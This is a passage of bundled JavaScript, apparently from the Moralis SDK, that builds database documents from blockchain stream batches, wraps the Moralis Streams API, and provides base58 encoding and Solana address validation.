        this.collectionNameBuilder = collectionNameBuilder;
        this.processor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$cf5d7ac98558aa60.build);
    }
    Erc20ApprovalsProcessor.prototype.process = function(batch) {
        return this.processor.process(batch.erc20Approvals, batch);
    };
    return Erc20ApprovalsProcessor;
}();
var $e96acc503731d7ac$var$TxRelatedId = /** @class */ function() {
    function TxRelatedId() {}
    TxRelatedId.create = function(chainId, transactionHash) {
        var safeTransactionHash = transactionHash.toLowerCase();
        return $e96acc503731d7ac$var$Sha256.hash("".concat(chainId, ";").concat(safeTransactionHash));
    };
    return TxRelatedId;
}();
var $e96acc503731d7ac$export$13be81799ef84040 = /** @class */ function() {
    function InternalTxDocumentBuilder() {}
    InternalTxDocumentBuilder.build = function(tx, block, confirmed, chainId) {
        var chain = Number(chainId);
        return {
            id: $e96acc503731d7ac$var$TxRelatedId.create(chain, tx.transactionHash),
            hash: tx.transactionHash,
            chainId: chain,
            from: tx.from,
            to: tx.to,
            value: tx.value,
            gas: parseInt(tx.gas || "0", 10),
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed
        };
    };
    return InternalTxDocumentBuilder;
}();
var $e96acc503731d7ac$export$a1367b1c11f13ff1 = /** @class */ function() {
    function InternalTxsProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.simpleProcessor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$13be81799ef84040.build);
    }
    InternalTxsProcessor.prototype.process = function(batch) {
        return this.simpleProcessor.process(batch.txsInternal, batch);
    };
    return InternalTxsProcessor;
}();
var $e96acc503731d7ac$export$e2b67e15c835d15e = /** @class */ function() {
    function LogDocumentValueFormatter() {}
    LogDocumentValueFormatter.format = function(param) {
        switch(param.type){
            case "string":
                return param.value;
            case "address":
                return param.value.toLowerCase();
            default:
                if ((0, $0df4577496dcf693$export$d97aa349ed20696).isBigNumber(param.value)) return param.value.toString();
                return param.value.toString();
        }
    };
    return LogDocumentValueFormatter;
}();
var $e96acc503731d7ac$export$70177f2e9c1b6bc = /** @class */ function() {
    function ParamNameResolver(restrictedNames) {
        this.restrictedNames = restrictedNames;
        this.usedNames = [];
    }
    ParamNameResolver.prototype.iterate = function(object, callback) {
        var _this = this;
        // We need to always keep parameters in the same order
        // because the RowParamNameResolver is order-sensitive.
        var sortedNames = Object.keys(object).sort(function(a, b) {
            return a.localeCompare(b);
        });
        sortedNames.forEach(function(name) {
            var safeName = _this.resolve(name);
            callback(safeName, object[name]);
        });
    };
    ParamNameResolver.prototype.resolve = function(name) {
        if (this.isUsed(name)) do name = "_".concat(name);
        while (this.isUsed(name));
        this.usedNames.push(name);
        return name;
    };
    ParamNameResolver.prototype.isUsed = function(name) {
        return this.restrictedNames.includes(name) || this.usedNames.includes(name);
    };
    return ParamNameResolver;
}();
var $e96acc503731d7ac$var$paramNames = [
    "id",
    "name",
    "logIndex",
    "transactionHash",
    "address",
    "blockHash",
    "blockTimestamp",
    "blockNumber",
    "confirmed",
    "chainId",
    "triggers"
];
var $e96acc503731d7ac$var$restrictedParamNames = $e96acc503731d7ac$var$__spreadArray($e96acc503731d7ac$var$__spreadArray([], $e96acc503731d7ac$var$paramNames, true), [
    // Some extra names
    "_id",
    "uniqueId",
    "updatedAt",
    "createdAt",
    "user",
    "userId"
], false);
var $e96acc503731d7ac$export$12d96da542b3b431 = /** @class */ function() {
    function LogDocumentBuilder() {}
    LogDocumentBuilder.build = function(log, parsedLog, block, confirmed, chainId) {
        var nameResolver = new $e96acc503731d7ac$export$70177f2e9c1b6bc($e96acc503731d7ac$var$restrictedParamNames);
        var chain = Number(chainId);
        var document = {
            id: $e96acc503731d7ac$var$LogRelatedId.create(chain, log.transactionHash, log.logIndex),
            name: parsedLog.name,
            logIndex: parseInt(log.logIndex, 10),
            transactionHash: log.transactionHash,
            address: log.address,
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            chainId: chain,
            triggers: $e96acc503731d7ac$var$TriggerItemsBuilder.build(log.triggers)
        };
        nameResolver.iterate(parsedLog.params, function(safeParamName, paramValue) {
            document[safeParamName] = $e96acc503731d7ac$export$e2b67e15c835d15e.format(paramValue);
        });
        return document;
    };
    return LogDocumentBuilder;
}();
var $e96acc503731d7ac$export$516b23f93f080618 = /** @class */ function() {
    function LogParser(abiItems) {
        this.abiInterface = new (0, $ef97d5c3a9a93354$export$48cefb51a4e315b2)(abiItems);
    }
    LogParser.prototype.read = function(log) {
        // Solidity supports max 3 topics. https://docs.soliditylang.org/en/latest/contracts.html#events
        var topics = [
            log.topic0,
            log.topic1,
            log.topic2,
            log.topic3
        ].filter(function(t) {
            return t !== null;
        });
        // Do not call the `this.abiInterface.parseLog()` method here! The @ethersproject/abi package (5.7.0) has a bug,
        // that doesn't return `args` with named keys in a specific case. That problem doesn't occur when we call directly the decodeEventLog() method.
        var eventFragment = this.abiInterface.getEvent(topics[0]);
        var args = this.abiInterface.decodeEventLog(eventFragment, log.data, topics);
        var params = {};
        eventFragment.inputs.forEach(function(input, index) {
            var type = input.type, name = input.name;
            var value = args[index];
            if (value instanceof (0, $ef97d5c3a9a93354$export$8ef99100a3c56f8c)) value = value.hash;
            params[name] = {
                type: type,
                value: value
            };
        });
        return {
            name: eventFragment.name,
            params: params
        };
    };
    return LogParser;
}();
var $e96acc503731d7ac$export$63558a44860fb924 = /** @class */ function() {
    function LogsProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
    }
    LogsProcessor.prototype.process = function(batch) {
        var updates = [];
        if (batch.abi.length < 1) return updates;
        var logParser = new $e96acc503731d7ac$export$516b23f93f080618(batch.abi);
        for(var _i = 0, _a = batch.logs; _i < _a.length; _i++){
            var log = _a[_i];
            var logParams = logParser.read(log);
            var document_1 = $e96acc503731d7ac$export$12d96da542b3b431.build(log, logParams, batch.block, batch.confirmed, batch.chainId);
            updates.push({
                collectionName: this.collectionNameBuilder.build(batch.tag),
                document: document_1
            });
        }
        return updates;
    };
    return LogsProcessor;
}();
var $e96acc503731d7ac$export$4a8b04e6c668400e = /** @class */ function() {
    function NftTransferDocumentBuilder() {}
    NftTransferDocumentBuilder.build = function(transfer, block, confirmed, chainId) {
        var chain = Number(chainId);
        var document = {
            id: $e96acc503731d7ac$var$LogRelatedId.create(chain, transfer.transactionHash, transfer.logIndex),
            transactionHash: transfer.transactionHash,
            contract: transfer.contract,
            logIndex: transfer.logIndex,
            operator: transfer.operator,
            from: transfer.from,
            to: transfer.to,
            tokenId: transfer.tokenId,
            amount: transfer.amount,
            tokenContractType: transfer.tokenContractType,
            tokenName: transfer.tokenName,
            tokenSymbol: transfer.tokenSymbol,
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            chainId: chain,
            triggers: $e96acc503731d7ac$var$TriggerItemsBuilder.build(transfer.triggers)
        };
        return document;
    };
    return NftTransferDocumentBuilder;
}();
var $e96acc503731d7ac$export$52fdccffea85d072 = /** @class */ function() {
    function NftTransfersProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.simpleProcessor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$4a8b04e6c668400e.build);
    }
    NftTransfersProcessor.prototype.process = function(batch) {
        return this.simpleProcessor.process(batch.nftTransfers, batch);
    };
    return NftTransfersProcessor;
}();
var $e96acc503731d7ac$export$7247caee014d1e7e = /** @class */ function() {
    function NftApprovalDocumentBuilder() {}
    NftApprovalDocumentBuilder.build = function(approval, block, confirmed, chainId) {
        var chain = Number(chainId);
        var document = {
            id: $e96acc503731d7ac$var$LogRelatedId.create(chain, approval.transactionHash, approval.logIndex),
            transactionHash: approval.transactionHash,
            contract: approval.contract,
            logIndex: approval.logIndex,
            operator: approval.operator,
            account: approval.account,
            approvedAll: approval.approvedAll,
            tokenId: approval.tokenId,
            tokenContractType: approval.tokenContractType,
            tokenName: approval.tokenName,
            tokenSymbol: approval.tokenSymbol,
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            chainId: chain
        };
        return document;
    };
    return NftApprovalDocumentBuilder;
}();
var $e96acc503731d7ac$export$5e625e27970be722 = /** @class */ function() {
    function NftApprovalsProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.simpleProcessor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$7247caee014d1e7e.build);
    }
    NftApprovalsProcessor.prototype.process = function(batch) {
        return this.simpleProcessor.process(batch.nftTokenApprovals, batch);
    };
    return NftApprovalsProcessor;
}();
var $e96acc503731d7ac$export$c7b4a7056a33808f = /** @class */ function() {
    function TxDocumentBuilder() {}
    TxDocumentBuilder.build = function(tx, block, confirmed, chainId) {
        var chain = Number(chainId);
        return {
            id: $e96acc503731d7ac$var$TxRelatedId.create(chain, tx.hash),
            hash: tx.hash,
            chainId: chain,
            transactionIndex: parseInt(tx.transactionIndex, 10),
            gas: parseInt(tx.gas, 10),
            gasPrice: parseInt(tx.gasPrice, 10),
            nonce: parseInt(tx.nonce, 10),
            fromAddress: tx.fromAddress,
            toAddress: tx.toAddress,
            value: tx.value || "0",
            input: tx.input,
            type: parseInt(tx.type, 10),
            receiptStatus: parseInt(tx.receiptStatus, 10),
            receiptGasUsed: parseInt(tx.receiptGasUsed, 10),
            receiptCumulativeGasUsed: parseInt(tx.receiptCumulativeGasUsed, 10),
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            triggers: $e96acc503731d7ac$var$TriggerItemsBuilder.build(tx.triggers)
        };
    };
    return TxDocumentBuilder;
}();
var $e96acc503731d7ac$export$43f172b1efe1aeb1 = /** @class */ function() {
    function TxsProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.processor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$c7b4a7056a33808f.build);
    }
    TxsProcessor.prototype.process = function(batch) {
        return this.processor.process(batch.txs, batch);
    };
    return TxsProcessor;
}();
var $e96acc503731d7ac$export$62eba65d695ffee = /** @class */ function() {
    function BatchProcessor(erc20ApprovalsProcessor, erc20TransfersProcessor, internalTxsProcessor, logsProcessor, nftApprovalsProcessor, nftTransfersProcessor, txsProcessor) {
        this.erc20ApprovalsProcessor = erc20ApprovalsProcessor;
        this.erc20TransfersProcessor = erc20TransfersProcessor;
        this.internalTxsProcessor = internalTxsProcessor;
        this.logsProcessor = logsProcessor;
        this.nftApprovalsProcessor = nftApprovalsProcessor;
        this.nftTransfersProcessor = nftTransfersProcessor;
        this.txsProcessor = txsProcessor;
    }
    BatchProcessor.create = function() {
        var nameBuilder = new $e96acc503731d7ac$export$19147bfdba679cec();
        return new BatchProcessor(new $e96acc503731d7ac$export$97151493f4a347e1(nameBuilder), new $e96acc503731d7ac$export$b03f9ca20951ba50(nameBuilder), new $e96acc503731d7ac$export$a1367b1c11f13ff1(nameBuilder), new $e96acc503731d7ac$export$63558a44860fb924(nameBuilder), new $e96acc503731d7ac$export$5e625e27970be722(nameBuilder), new $e96acc503731d7ac$export$52fdccffea85d072(nameBuilder), new $e96acc503731d7ac$export$43f172b1efe1aeb1(nameBuilder));
    };
    BatchProcessor.prototype.process = function(batch) {
        var _this = this;
        return {
            erc20Approvals: function() {
                return _this.erc20ApprovalsProcessor.process(batch);
            },
            erc20Transfers: function() {
                return _this.erc20TransfersProcessor.process(batch);
            },
            internalTxs: function() {
                return _this.internalTxsProcessor.process(batch);
            },
            logs: function() {
                return _this.logsProcessor.process(batch);
            },
            nftApprovals: function() {
                return _this.nftApprovalsProcessor.process(batch);
            },
            nftTransfers: function() {
                return _this.nftTransfersProcessor.process(batch);
            },
            txs: function() {
                return _this.txsProcessor.process(batch);
            }
        };
    };
    return BatchProcessor;
}();
var $e96acc503731d7ac$var$parseLog = function(webhookData) {
    if (!$e96acc503731d7ac$var$isWebhook(webhookData)) throw new (0, $10891f2cb3e98601$export$b95da19793ffce92)({
        code: (0, $10891f2cb3e98601$export$c7aa09645659b4e0).GENERIC_STREAM_ERROR,
        message: "Cannot decode the logs. No logs found in the webhook, or invalid webhook provided."
    });
    if (!$e96acc503731d7ac$var$hasAbis(webhookData)) throw new (0, $10891f2cb3e98601$export$b95da19793ffce92)({
        code: (0, $10891f2cb3e98601$export$c7aa09645659b4e0).GENERIC_STREAM_ERROR,
        message: "Cannot decode the logs. No abis found in the provided webhook."
    });
    var logs = webhookData.logs, abi = webhookData.abi;
    var decodedLogs = [];
    logs.forEach(function(currentLog) {
        var params = new $e96acc503731d7ac$export$516b23f93f080618(abi).read(currentLog).params;
        // eslint-disable-next-line @typescript-eslint/no-explicit-any
        var decodedLog = {};
        for(var key in params)if (Object.prototype.hasOwnProperty.call(params, key)) {
            var element = params[key];
            decodedLog[key] = element.value;
        }
        decodedLogs.push(decodedLog);
    });
    return decodedLogs;
};
var $e96acc503731d7ac$var$makeGetAptosAddresses = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $be177b42cca18859$export$1104b7fb41dbce54), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetEvmAddresses = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $be177b42cca18859$export$e8a0e605eeabfb6e), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetAddresses = function(core, baseUrl) {
    return function(getAddressesOptions) {
        switch(getAddressesOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeGetAptosAddresses(core, baseUrl, getAddressesOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeGetEvmAddresses(core, baseUrl, getAddressesOptions);
            default:
                if (getAddressesOptions.networkType === undefined) return $e96acc503731d7ac$var$makeGetEvmAddresses(core, baseUrl, getAddressesOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(getAddressesOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeDeleteAddressAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$fd577bad721745d0), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeDeleteAddressEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$594575f06eb25032), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeDeleteAddress = function(core, baseUrl) {
    return function(deleteAddressOptions) {
        switch(deleteAddressOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeDeleteAddressAptosStream(core, baseUrl, deleteAddressOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeDeleteAddressEvmStream(core, baseUrl, deleteAddressOptions);
            default:
                if (deleteAddressOptions.networkType === undefined) return $e96acc503731d7ac$var$makeDeleteAddressEvmStream(core, baseUrl, deleteAddressOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(deleteAddressOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeGetAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    _a.network;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType",
        "network"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$e3102e9186649228), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    _a.network;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType",
        "network"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$fbc4e64b14e2716e), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetStreamById = function(core, baseUrl) {
    return function(getStreamOptions) {
        // Backwards compatibility for the 'network' parameter
        if (!getStreamOptions.networkType && getStreamOptions.network) getStreamOptions.networkType = getStreamOptions.network;
        switch(getStreamOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeGetAptosStream(core, baseUrl, getStreamOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeGetEvmStream(core, baseUrl, getStreamOptions);
            default:
                if (getStreamOptions.networkType === undefined) return $e96acc503731d7ac$var$makeGetEvmStream(core, baseUrl, getStreamOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(getStreamOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$StreamsConfigSetup = /** @class */ function() {
    function StreamsConfigSetup() {}
    StreamsConfigSetup.register = function(config) {
        config.registerKey($e96acc503731d7ac$var$StreamsConfig.streamsSecret);
    };
    return StreamsConfigSetup;
}();
var $e96acc503731d7ac$var$BASE_URL = "https://api.moralis-streams.com";
var $e96acc503731d7ac$export$8ee3a38db681f49d = /** @class */ function(_super) {
    $e96acc503731d7ac$var$__extends(Streams, _super);
    function Streams(core) {
        var _this = _super.call(this, Streams.moduleName, core, function() {
            return $e96acc503731d7ac$var$BASE_URL;
        }) || this;
        _this.add = $e96acc503731d7ac$var$makeCreateStream(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.update = $e96acc503731d7ac$var$makeUpdateStream(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.delete = $e96acc503731d7ac$var$makeDeleteStream(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.getAll = $e96acc503731d7ac$var$makeGetStreams(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.getById = $e96acc503731d7ac$var$makeGetStreamById(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.updateStatus = $e96acc503731d7ac$var$makeUpdateStreamStatus(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.addAddress = $e96acc503731d7ac$var$makeAddAddress(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.getAddresses = $e96acc503731d7ac$var$makeGetAddresses(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.deleteAddress = $e96acc503731d7ac$var$makeDeleteAddress(_this.core, $e96acc503731d7ac$var$BASE_URL);
        _this.getHistory = _this.createPaginatedFetcher((0, $be177b42cca18859$export$7746ed4e5712d0e5));
        _this.getLogs = _this.createPaginatedFetcher((0, $be177b42cca18859$export$8e5852afff92447b));
        _this.retry = _this.createFetcher((0, $be177b42cca18859$export$e283da455dc8626b));
        _this._getStats = _this.createFetcher((0, $be177b42cca18859$export$46d070e9f577efc8));
        _this.getStats = function() {
            return _this._getStats({});
        };
        _this.getStatsById = _this.createFetcher((0, $be177b42cca18859$export$4df77fd2c69cb5e7));
        _this.setSettings = _this.createFetcher((0, $be177b42cca18859$export$ef6a493f85f251b));
        _this._readSettings = _this.createFetcher((0, $be177b42cca18859$export$74e5854bc75714d3));
        _this.readSettings = function() {
            return _this._readSettings({});
        };
        _this.verifySignature = function(options) {
            return $e96acc503731d7ac$var$makeVerifySignature(_this.core.config)(options);
        };
        _this.parsedLogs = function(webhookData) {
            return $e96acc503731d7ac$var$parseLog(webhookData);
        };
        return _this;
    }
    Streams.create = function(core) {
        return new Streams(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    Streams.prototype.setup = function() {
        $e96acc503731d7ac$var$StreamsConfigSetup.register(this.core.config);
    };
    Streams.prototype.start = function() {
    // Nothing
    };
    Streams.prototype.createFetcher = function(operation) {
        return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)(operation, $e96acc503731d7ac$var$BASE_URL, this.core).fetch;
    };
    Streams.prototype.createPaginatedFetcher = function(operation) {
        return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)(operation, $e96acc503731d7ac$var$BASE_URL, this.core).fetch;
    };
    Streams.moduleName = "streams";
    return Streams;
}((0, $10891f2cb3e98601$export$6d7e12e62bd6aef5));






var $dEXSZ = parcelRequire("dEXSZ");
var $8b756b3b8ee97947$exports = {};
var $3e45b9ca9a48d890$exports = {};
"use strict";
// base-x encoding / decoding
// Copyright (c) 2018 base-x contributors
// Copyright (c) 2014-2018 The Bitcoin Core developers (base58.cpp)
// Distributed under the MIT software license, see the accompanying
// file LICENSE or http://www.opensource.org/licenses/mit-license.php.
function $3e45b9ca9a48d890$var$base(ALPHABET) {
    if (ALPHABET.length >= 255) throw new TypeError("Alphabet too long");
    var BASE_MAP = new Uint8Array(256);
    for(var j = 0; j < BASE_MAP.length; j++)BASE_MAP[j] = 255;
    for(var i = 0; i < ALPHABET.length; i++){
        var x = ALPHABET.charAt(i);
        var xc = x.charCodeAt(0);
        if (BASE_MAP[xc] !== 255) throw new TypeError(x + " is ambiguous");
        BASE_MAP[xc] = i;
    }
    var BASE = ALPHABET.length;
    var LEADER = ALPHABET.charAt(0);
    var FACTOR = Math.log(BASE) / Math.log(256) // log(BASE) / log(256), rounded up
    ;
    var iFACTOR = Math.log(256) / Math.log(BASE) // log(256) / log(BASE), rounded up
    ;
    function encode(source) {
        if (source instanceof Uint8Array) ;
        else if (ArrayBuffer.isView(source)) source = new Uint8Array(source.buffer, source.byteOffset, source.byteLength);
        else if (Array.isArray(source)) source = Uint8Array.from(source);
        if (!(source instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
        if (source.length === 0) return "";
        // Skip & count leading zeroes.
        var zeroes = 0;
        var length = 0;
        var pbegin = 0;
        var pend = source.length;
        while(pbegin !== pend && source[pbegin] === 0){
            pbegin++;
            zeroes++;
        }
        // Allocate enough space in big-endian base58 representation.
        var size = (pend - pbegin) * iFACTOR + 1 >>> 0;
        var b58 = new Uint8Array(size);
        // Process the bytes.
        while(pbegin !== pend){
            var carry = source[pbegin];
            // Apply "b58 = b58 * 256 + ch".
            var i = 0;
            for(var it1 = size - 1; (carry !== 0 || i < length) && it1 !== -1; it1--, i++){
                carry += 256 * b58[it1] >>> 0;
                b58[it1] = carry % BASE >>> 0;
                carry = carry / BASE >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            pbegin++;
        }
        // Skip leading zeroes in base58 result.
        var it2 = size - length;
        while(it2 !== size && b58[it2] === 0)it2++;
        // Translate the result into a string.
        var str = LEADER.repeat(zeroes);
        for(; it2 < size; ++it2)str += ALPHABET.charAt(b58[it2]);
        return str;
    }
    function decodeUnsafe(source) {
        if (typeof source !== "string") throw new TypeError("Expected String");
        if (source.length === 0) return new Uint8Array();
        var psz = 0;
        // Skip and count leading '1's.
        var zeroes = 0;
        var length = 0;
        while(source[psz] === LEADER){
            zeroes++;
            psz++;
        }
        // Allocate enough space in big-endian base256 representation.
        var size = (source.length - psz) * FACTOR + 1 >>> 0 // log(58) / log(256), rounded up.
        ;
        var b256 = new Uint8Array(size);
        // Process the characters.
        while(source[psz]){
            // Decode character
            var carry = BASE_MAP[source.charCodeAt(psz)];
            // Invalid character
            if (carry === 255) return;
            var i = 0;
            for(var it3 = size - 1; (carry !== 0 || i < length) && it3 !== -1; it3--, i++){
                carry += BASE * b256[it3] >>> 0;
                b256[it3] = carry % 256 >>> 0;
                carry = carry / 256 >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            psz++;
        }
        // Skip leading zeroes in b256.
        var it4 = size - length;
        while(it4 !== size && b256[it4] === 0)it4++;
        var vch = new Uint8Array(zeroes + (size - it4));
        var j = zeroes;
        while(it4 !== size)vch[j++] = b256[it4++];
        return vch;
    }
    function decode(string) {
        var buffer = decodeUnsafe(string);
        if (buffer) return buffer;
        throw new Error("Non-base" + BASE + " character");
    }
    return {
        encode: encode,
        decodeUnsafe: decodeUnsafe,
        decode: decode
    };
}
$3e45b9ca9a48d890$exports = $3e45b9ca9a48d890$var$base;


const $8b756b3b8ee97947$var$ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz";
$8b756b3b8ee97947$exports = $3e45b9ca9a48d890$exports($8b756b3b8ee97947$var$ALPHABET);



var $6ZWSX = parcelRequire("6ZWSX");
/**
 * Copied (and remove obsolete functionalities) from https://github.com/solana-labs/solana-web3.js/blob/master/src/publickey.ts because
 * - We only care about address validation and conversion
 * - Resolving this dependency in UMD gives dependency errors
 */ /**
 * Size of public key in bytes
 */ var $cb2d40467f9cecb7$var$PUBLIC_KEY_LENGTH = 32;
function $cb2d40467f9cecb7$var$isPublicKeyData(value) {
    return value._bn !== undefined;
}
var $cb2d40467f9cecb7$var$PublicKey = /** @class */ function() {
    /**
     * Create a new PublicKey object
     * @param value ed25519 public key as buffer or base-58 encoded string
     */ function PublicKey(value) {
        if ($cb2d40467f9cecb7$var$isPublicKeyData(value)) this._bn = value._bn;
        else {
            if (typeof value === "string") {
                // assume base 58 encoding by default
                var decoded = (0, (/*@__PURE__*/$parcel$interopDefault($8b756b3b8ee97947$exports))).decode(value);
                if (decoded.length !== $cb2d40467f9cecb7$var$PUBLIC_KEY_LENGTH) throw new Error("Invalid public key input");
                this._bn = new (0, (/*@__PURE__*/$parcel$interopDefault($dEXSZ)))(decoded);
            } else this._bn = new (0, (/*@__PURE__*/$parcel$interopDefault($dEXSZ)))(value);
            if (this._bn.byteLength() > $cb2d40467f9cecb7$var$PUBLIC_KEY_LENGTH) throw new Error("Invalid public key input");
        }
    }
    /**
     * Return the base-58 representation of the public key
     */ PublicKey.prototype.toBase58 = function() {
        return (0, (/*@__PURE__*/$parcel$interopDefault($8b756b3b8ee97947$exports))).encode(this.toBytes());
    };
    /**
     * Return the byte array representation of the public key in big endian
     */ PublicKey.prototype.toBytes = function() {
        var buf = this.toBuffer();
        return new Uint8Array(buf.buffer, buf.byteOffset, buf.byteLength);
    };
    /**
     * Return the Buffer representation of the public key in big endian
     */ PublicKey.prototype.toBuffer = function() {
        var b = this._bn.toArrayLike((0, $6ZWSX.Buffer));
        if (b.length === $cb2d40467f9cecb7$var$PUBLIC_KEY_LENGTH) return b;
        var zeroPad = (0, $6ZWSX.Buffer).alloc(32);
        b.copy(zeroPad, 32 - b.length);
        return zeroPad;
    };
    Object.defineProperty(PublicKey.prototype, Symbol.toStringTag, {
        get: function() {
            return "PublicKey(".concat(this.toString(), ")");
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Return the base-58 representation of the public key
     */ PublicKey.prototype.toString = function() {
        return this.toBase58();
    };
    return PublicKey;
}();
/**
 * A representation of an address on the Solana network.
 *
 * Use this class any time you work with an address.
 *
 * @category DataType
 */ var $cb2d40467f9cecb7$export$a1a535cec16ecc43 = /** @class */ function() {
    function SolAddress(address) {
        this.address = address;
    }
    /**
     * Create a new instance of SolAddress from any valid address input.
     *
     * @example `const address = SolAddress.create("9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM")`
     * @throws an error when a passed address is invalid.
     */ SolAddress.create = function(address) {
        return address instanceof SolAddress ? address : new SolAddress(SolAddress.parse(address));
    };
    SolAddress.fromJSON = function(address) {
        return SolAddress.create(address);
    };
    SolAddress.parse = function(address) {
        try {
            var publicKey = new $cb2d40467f9cecb7$var$PublicKey(address);
            return publicKey.toBase58();
        } catch (e) {
            throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                message: "Invalid Solana address provided: ".concat(address),
                cause: e
            });
        }
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ SolAddress.prototype.format = function() {
        return this.address;
    };
    /**
     * Checks the equality of the current address with another Solana address.
     * @example `address.equals("9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM")`
     * @example `address.equals(SolAddress.create("9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM"))`
     */ SolAddress.prototype.equals = function(address) {
        return this.address === SolAddress.create(address).address;
    };
    /**
     * @returns a string representing the address.
     * @example address.toString(); // "9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM"
     */ SolAddress.prototype.toString = function() {
        return this.address;
    };
    /**
     * @returns a string representing the address.
     * @example address.toJSON(); // "9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM"
     */ SolAddress.prototype.toJSON = function() {
        return this.address;
    };
    return SolAddress;
}();
var $cb2d40467f9cecb7$var$solNetworkNames = [
    "mainnet",
    "devnet"
];
/**
 * A representation of a Solana network.
 *
 * @category DataType
 */ var $cb2d40467f9cecb7$export$27894271d6c8b00 = /** @class */ function() {
    function SolNetwork(network) {
        this.network = network;
    }
    Object.defineProperty(SolNetwork, "MAINNET", {
        /**
         * Returns MAINNET network
         *
